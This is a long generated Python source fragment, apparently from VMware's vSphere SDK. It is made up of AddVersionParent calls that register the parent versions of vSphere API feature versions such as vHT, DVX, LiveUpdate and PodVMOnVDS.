AddVersionParent("vim.version.disabled", "vim.version.MemoryTiering")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.disabled", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("vim.version.disabled", "vim.version.guestDetailedData")
AddVersionParent("vim.version.disabled", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("vim.version.disabled", "vim.version.vdcs")
AddVersionParent("vim.version.disabled", "vmodl.version.version0")
AddVersionParent("vim.version.disabled", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("vim.version.disabled", "vmodl.version.version1")
AddVersionParent("vim.version.disabled", "vmodl.version.version2")
AddVersionParent("vim.version.disabled", "vim.version.v6_9_1")
AddVersionParent("vim.version.disabled", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("vim.version.disabled", "vim.version.NsxLiveUpdate")
AddVersionParent("vim.version.disabled", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.disabled", "vim.version.vVol_datastore_scalability")
AddVersionParent("vim.version.disabled", "vim.version.AssignHwCompositeDev")
AddVersionParent("vim.version.disabled", "vim.version.v6_8_7")
AddVersionParent("vim.version.disabled", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.disabled", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.disabled", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.disabled", "vim.version.VQAT")
AddVersionParent("vim.version.disabled", "vim.version.VCDP_NestedFilters")
AddVersionParent("vim.version.disabled", "vim.version.nativeSnapshot")
AddVersionParent("vim.version.disabled", "vim.version.hostProfiles")
AddVersionParent("vim.version.disabled", "vim.version.GraphicsDRS")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.disabled", "vim.version.hwh")
AddVersionParent("vim.version.disabled", "vim.version.version13")
AddVersionParent("vim.version.disabled", "vim.version.version14")
AddVersionParent("vim.version.disabled", "vim.version.version15")
AddVersionParent("vim.version.disabled", "vim.version.VSAN2_Configure")
AddVersionParent("vim.version.disabled", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("vim.version.disabled", "vim.version.gosCrashRemediation")
AddVersionParent("vim.version.disabled", "vim.version.VCSOF_173")
AddVersionParent("vim.version.disabled", "vim.version.pciSriovExtendedID")
AddVersionParent("vim.version.disabled", "vim.version.vmxnet3UPT")
AddVersionParent("vim.version.disabled", "vim.version.version10")
AddVersionParent("vim.version.disabled", "vim.version.version11")
AddVersionParent("vim.version.disabled", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("vim.version.disabled", "vim.version.version12")
AddVersionParent("vim.version.disabled", "vim.version.pciDeviceExt")
AddVersionParent("vim.version.disabled", "vim.version.toolsOffHost")
AddVersionParent("vim.version.disabled", "vim.version.hostCertificateManagement")
AddVersionParent("vim.version.disabled", "vim.version.vmMisc")
AddVersionParent("vim.version.disabled", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("vim.version.disabled", "vim.version.LSI2PVSCSI")
AddVersionParent("vim.version.disabled", "vim.version.ProvisioningEventRefresh")
AddVersionParent("vim.version.disabled", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.disabled", "vim.version.pr1803450")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.disabled", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("vim.version.disabled", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("vim.version.disabled", "vim.version.WCP_FaultDomains")
AddVersionParent("vim.version.disabled", "vim.version.dnd")
AddVersionParent("vim.version.disabled", "vim.version.optional_virtual_disks")
AddVersionParent("vim.version.disabled", "vim.version.hwh2_0")
AddVersionParent("vim.version.disabled", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.disabled", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("vim.version.disabled", "vim.version.EventsOrdering")
AddVersionParent("vim.version.disabled", "vim.version.PMemV2")
AddVersionParent("vim.version.disabled", "vim.version.v7_0")
AddVersionParent("vim.version.disabled", "vim.version.FileLockInfo_GSS34")
AddVersionParent("vim.version.disabled", "vim.version.version8")
AddVersionParent("vim.version.disabled", "vim.version.version9")
AddVersionParent("vim.version.disabled", "vim.version.version6")
AddVersionParent("vim.version.disabled", "vim.version.version7")
AddVersionParent("vim.version.disabled", "vim.version.DiskGroupVMC")
AddVersionParent("vim.version.disabled", "vim.version.TrustAuthority_V4")
AddVersionParent("vim.version.disabled", "vim.version.version1")
AddVersionParent("vim.version.disabled", "vim.version.version4")
AddVersionParent("vim.version.disabled", "vim.version.version5")
AddVersionParent("vim.version.disabled", "vim.version.SRIOVValidNumVFs")
AddVersionParent("vim.version.disabled", "vim.version.version2")
AddVersionParent("vim.version.disabled", "vim.version.version3")
AddVersionParent("vim.version.disabled", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("vim.version.disabled", "vim.version.VmxRebootPowerOff")
AddVersionParent("vim.version.disabled", "vim.version.ClusteredEsx_V1")
AddVersionParent("vim.version.disabled", "vim.version.fourKnStorageSupport")
AddVersionParent("vim.version.disabled", "vim.version.resetportstatistics")
AddVersionParent("vim.version.disabled", "vim.version.batchRenameSupport")
AddVersionParent("vim.version.disabled", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("vim.version.disabled", "vim.version.SGX_MPA_HostReg")
AddVersionParent("vim.version.disabled", "vim.version.GreenMetrics")
AddVersionParent("vim.version.disabled", "vim.version.hostVendorSpecificStatus")
AddVersionParent("vim.version.disabled", "vim.version.VMcrypt_V4")
AddVersionParent("vim.version.disabled", "vim.version.hostAccessManager")
AddVersionParent("vim.version.disabled", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("vim.version.disabled", "vim.version.VirtualTopo")
AddVersionParent("vim.version.disabled", "vim.version.Tools_Update_Health")
AddVersionParent("vim.version.disabled", "vim.version.CPU_Scheduler_Info")
AddVersionParent("vim.version.disabled", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("vim.version.disabled", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("vim.version.disabled", "vim.version.smartnic_vc")
AddVersionParent("vim.version.disabled", "vim.version.HWv20")
AddVersionParent("vim.version.disabled", "vim.version.unstable")
AddVersionParent("vim.version.disabled", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("vim.version.disabled", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("vim.version.disabled", "vim.version.bmcInfo")
AddVersionParent("vim.version.disabled", "vim.version.disabled")
AddVersionParent("vim.version.disabled", "vim.version.vHT")
AddVersionParent("vim.version.disabled", "vim.version.ClusterConfigManagerV2")
AddVersionParent("vim.version.disabled", "vim.version.smartnic_network")
AddVersionParent("vim.version.disabled", "vim.version.DVX")
AddVersionParent("vim.version.disabled", "vim.version.VmcExternalStorageSupport")
AddVersionParent("vim.version.disabled", "vim.version.PodVMOnVDS")
AddVersionParent("vim.version.disabled", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("vim.version.disabled", "vim.version.LiveUpdate")
AddVersionParent("vim.version.disabled", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("vim.version.disabled", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("vim.version.disabled", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("vim.version.disabled", "vim.version.FCD_PERFORMANCE")
AddVersionParent("vim.version.disabled", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("vim.version.disabled", "vim.version.nsx_uens_u2")
AddVersionParent("vim.version.vHT", "vmodl.query.version.version4")
AddVersionParent("vim.version.vHT", "vmodl.query.version.version3")
AddVersionParent("vim.version.vHT", "vmodl.query.version.version2")
AddVersionParent("vim.version.vHT", "vmodl.query.version.version1")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.vHT", "vmodl.version.version0")
AddVersionParent("vim.version.vHT", "vmodl.version.version1")
AddVersionParent("vim.version.vHT", "vmodl.version.version2")
AddVersionParent("vim.version.vHT", "vim.version.v6_9_1")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.vHT", "vim.version.v6_8_7")
AddVersionParent("vim.version.vHT", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.vHT", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.vHT", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.vHT", "vim.version.version13")
AddVersionParent("vim.version.vHT", "vim.version.version14")
AddVersionParent("vim.version.vHT", "vim.version.version15")
AddVersionParent("vim.version.vHT", "vim.version.version10")
AddVersionParent("vim.version.vHT", "vim.version.version11")
AddVersionParent("vim.version.vHT", "vim.version.version12")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.vHT", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.vHT", "vim.version.v7_0")
AddVersionParent("vim.version.vHT", "vim.version.version8")
AddVersionParent("vim.version.vHT", "vim.version.version9")
AddVersionParent("vim.version.vHT", "vim.version.version6")
AddVersionParent("vim.version.vHT", "vim.version.version7")
AddVersionParent("vim.version.vHT", "vim.version.version1")
AddVersionParent("vim.version.vHT", "vim.version.version4")
AddVersionParent("vim.version.vHT", "vim.version.version5")
AddVersionParent("vim.version.vHT", "vim.version.version2")
AddVersionParent("vim.version.vHT", "vim.version.version3")
AddVersionParent("vim.version.vHT", "vim.version.vHT")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.query.version.version4")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.query.version.version3")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.query.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.query.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.version.version0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v6_9_1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v6_8_7")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version13")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version14")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version15")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version10")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version11")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version12")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.v7_0")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version8")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version9")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version6")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version7")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version4")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version5")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.version3")
AddVersionParent("vim.version.ClusterConfigManagerV2", "vim.version.ClusterConfigManagerV2")
AddVersionParent("vim.version.smartnic_network", "vmodl.query.version.version4")
AddVersionParent("vim.version.smartnic_network", "vmodl.query.version.version3")
AddVersionParent("vim.version.smartnic_network", "vmodl.query.version.version2")
AddVersionParent("vim.version.smartnic_network", "vmodl.query.version.version1")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.smartnic_network", "vmodl.version.version0")
AddVersionParent("vim.version.smartnic_network", "vmodl.version.version1")
AddVersionParent("vim.version.smartnic_network", "vmodl.version.version2")
AddVersionParent("vim.version.smartnic_network", "vim.version.v6_9_1")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.smartnic_network", "vim.version.v6_8_7")
AddVersionParent("vim.version.smartnic_network", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.smartnic_network", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.smartnic_network", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.smartnic_network", "vim.version.version13")
AddVersionParent("vim.version.smartnic_network", "vim.version.version14")
AddVersionParent("vim.version.smartnic_network", "vim.version.version15")
AddVersionParent("vim.version.smartnic_network", "vim.version.version10")
AddVersionParent("vim.version.smartnic_network", "vim.version.version11")
AddVersionParent("vim.version.smartnic_network", "vim.version.version12")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.smartnic_network", "vim.version.v7_0")
AddVersionParent("vim.version.smartnic_network", "vim.version.version8")
AddVersionParent("vim.version.smartnic_network", "vim.version.version9")
AddVersionParent("vim.version.smartnic_network", "vim.version.version6")
AddVersionParent("vim.version.smartnic_network", "vim.version.version7")
AddVersionParent("vim.version.smartnic_network", "vim.version.version1")
AddVersionParent("vim.version.smartnic_network", "vim.version.version4")
AddVersionParent("vim.version.smartnic_network", "vim.version.version5")
AddVersionParent("vim.version.smartnic_network", "vim.version.version2")
AddVersionParent("vim.version.smartnic_network", "vim.version.version3")
AddVersionParent("vim.version.smartnic_network", "vim.version.smartnic_network")
AddVersionParent("vim.version.DVX", "vmodl.query.version.version4")
AddVersionParent("vim.version.DVX", "vmodl.query.version.version3")
AddVersionParent("vim.version.DVX", "vmodl.query.version.version2")
AddVersionParent("vim.version.DVX", "vmodl.query.version.version1")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.DVX", "vmodl.version.version0")
AddVersionParent("vim.version.DVX", "vmodl.version.version1")
AddVersionParent("vim.version.DVX", "vmodl.version.version2")
AddVersionParent("vim.version.DVX", "vim.version.v6_9_1")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.DVX", "vim.version.v6_8_7")
AddVersionParent("vim.version.DVX", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.DVX", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.DVX", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.DVX", "vim.version.version13")
AddVersionParent("vim.version.DVX", "vim.version.version14")
AddVersionParent("vim.version.DVX", "vim.version.version15")
AddVersionParent("vim.version.DVX", "vim.version.version10")
AddVersionParent("vim.version.DVX", "vim.version.version11")
AddVersionParent("vim.version.DVX", "vim.version.version12")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.DVX", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.DVX", "vim.version.v7_0")
AddVersionParent("vim.version.DVX", "vim.version.version8")
AddVersionParent("vim.version.DVX", "vim.version.version9")
AddVersionParent("vim.version.DVX", "vim.version.version6")
AddVersionParent("vim.version.DVX", "vim.version.version7")
AddVersionParent("vim.version.DVX", "vim.version.version1")
AddVersionParent("vim.version.DVX", "vim.version.version4")
AddVersionParent("vim.version.DVX", "vim.version.version5")
AddVersionParent("vim.version.DVX", "vim.version.version2")
AddVersionParent("vim.version.DVX", "vim.version.version3")
AddVersionParent("vim.version.DVX", "vim.version.DVX")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.query.version.version4")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.query.version.version3")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.query.version.version2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.query.version.version1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.version.version0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.version.version1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.version.version2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v6_9_1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v6_8_7")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version13")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version14")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version15")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version10")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version11")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version12")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.v7_0")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version8")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version9")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version6")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version7")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version1")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version4")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version5")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version2")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.version3")
AddVersionParent("vim.version.VmcExternalStorageSupport", "vim.version.VmcExternalStorageSupport")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.query.version.version4")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.query.version.version3")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.query.version.version2")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.query.version.version1")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.version.version0")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.version.version1")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.version.version2")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v6_9_1")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v6_8_7")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.PodVMOnVDS", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version13")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version14")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version15")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version10")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version11")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version12")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.v7_0")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version8")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version9")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version6")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version7")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version1")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version4")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version5")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version2")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.version3")
AddVersionParent("vim.version.PodVMOnVDS", "vim.version.PodVMOnVDS")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.query.version.version4")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.query.version.version3")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.query.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.query.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.version.version0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v6_9_1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v6_8_7")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version13")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version14")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version15")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version10")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version11")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version12")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.v7_0")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version8")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version9")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version6")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version7")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version1")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version4")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version5")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version2")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.version3")
AddVersionParent("vim.version.ClusterConfigManagerTransition", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("vim.version.LiveUpdate", "vmodl.query.version.version4")
AddVersionParent("vim.version.LiveUpdate", "vmodl.query.version.version3")
AddVersionParent("vim.version.LiveUpdate", "vmodl.query.version.version2")
AddVersionParent("vim.version.LiveUpdate", "vmodl.query.version.version1")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.LiveUpdate", "vmodl.version.version0")
AddVersionParent("vim.version.LiveUpdate", "vmodl.version.version1")
AddVersionParent("vim.version.LiveUpdate", "vmodl.version.version2")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v6_9_1")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v6_8_7")
AddVersionParent("vim.version.LiveUpdate", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.LiveUpdate", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version13")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version14")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version15")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version10")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version11")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version12")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.LiveUpdate", "vim.version.v7_0")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version8")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version9")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version6")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version7")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version1")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version4")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version5")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version2")
AddVersionParent("vim.version.LiveUpdate", "vim.version.version3")
AddVersionParent("vim.version.LiveUpdate", "vim.version.LiveUpdate")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.query.version.version4")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.query.version.version3")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.query.version.version2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.query.version.version1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.version.version0")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.version.version1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.version.version2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v6_9_1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v6_8_7")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.Vmfs_Unmap_Ultralow_Rate", "vim.version.v8_0_0_0")
